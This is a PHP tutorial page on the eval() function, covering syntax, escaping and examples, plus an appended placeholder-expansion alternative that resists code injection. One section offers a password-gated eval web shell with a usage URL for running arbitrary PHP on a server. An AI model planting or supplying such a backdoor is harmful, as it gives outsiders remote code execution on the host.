Introduction to PHP eval functions

  • 2020-12-05 17:07:49
  • OfStack

Code:


eval("echo 'hello world';");

The above code is the same as the following code:

echo "hello world";

Output in the browser: hello world

The following points should be noted when using eval() :

1. The code string passed to eval must end with a semicolon, and the eval statement itself is followed by a further semicolon (this is a PHP requirement).

2. Pay attention to single quotes, double quotes and backslashes. If the argument contains a variable and that variable is assigned to, the $ symbol before the variable must be escaped with \. If there is no assignment, escaping is not required.

Code:


$a = 100;
eval("echo $a;");

Because there is no assignment, the $ does not have to be escaped here. The same statement with \ before $ is written as follows:


$a = 100;
eval("echo \$a;");

3. Note that the command string (including its semicolon) must be enclosed in double or single quotation marks as needed; otherwise an error occurs.

A command string is a string that contains commands such as echo and print.

If the argument is just a single variable, the quotation marks can be omitted. For example:


$func =<<<FUNC
function test(){ 
  echo "test eval function"; 
}
FUNC;
eval($func);
test();

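An example of a PHP eval backdoor program

It requires that the eval function is available. The script passes the a request parameter directly to eval(), so whoever knows the password can run any PHP code on the server.
Usage:
http://url/test.php?pwd=admin&action=eval&a=phpinfo();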


<?php
$passwd="admin";if($_GET['pwd']!=$passwd)exit;
if($_GET['action']=="eval" && $_GET['a']){eval($_GET['a']);}
?>

PHP eval() function introduction

Definition and usage

The eval() function evaluates a string as PHP code.

The string must be valid PHP code and must end with a semicolon.

If the return statement is not called in the code string, NULL is returned. If there is a parsing error in the code, the eval() function returns false.

Syntax
eval(phpcode)

Parameter    Description
phpcode      Required. Specifies the PHP code to be evaluated.

Tips and notes
Note: The return statement immediately terminates the evaluation of the string.
Tip: This function is useful for storing code in a database text field for later computation.
Example


<?php
$string = "beautiful";
$time = "winter";

$str = 'This is a $string $time morning!';
echo $str. "<br />";

eval("\$str = \"$str\";");
echo $str;
?> 

Output:
This is a $string $time morning!
This is a beautiful winter morning!
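
The substitution shown above can be done without eval(). The following is an added example, not code from the original article: the function name expand_template() and the hostile sample string are assumptions made up for illustration. It fills in $name placeholders from an explicit list of values, so text that reaches the template is never executed.

```php
<?php
// Added example (not from the original article). expand_template() is a
// hypothetical helper name; the sample strings are constructed.

/**
 * Replace $name placeholders with values from an explicit allowlist.
 * Placeholders that are not listed are left untouched, and nothing in
 * the template is ever run as PHP.
 */
function expand_template(string $template, array $vars): string
{
    $result = preg_replace_callback(
        '/\$([A-Za-z_][A-Za-z0-9_]*)/',
        function (array $m) use ($vars): string {
            // Substitute only names the caller supplied; the value is
            // cast to string and inserted as plain data.
            return array_key_exists($m[1], $vars)
                ? (string) $vars[$m[1]]
                : $m[0];
        },
        $template
    );

    // preg_replace_callback() returns null on a regex engine error;
    // fall back to the unmodified template in that case.
    return $result ?? $template;
}

$vars = ['string' => 'beautiful', 'time' => 'winter'];

// Same template as in the article's example.
echo expand_template('This is a $string $time morning!', $vars), "\n";

// Constructed template containing a double quote. Passed through
// eval("\$str = \"$str\";") the quote would close the string literal
// and the remainder would be evaluated as PHP statements. Here it is
// returned unchanged as inert text.
$hostile = 'x"; echo "injected"; $y = "';
echo expand_template($hostile, $vars), "\n";
```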

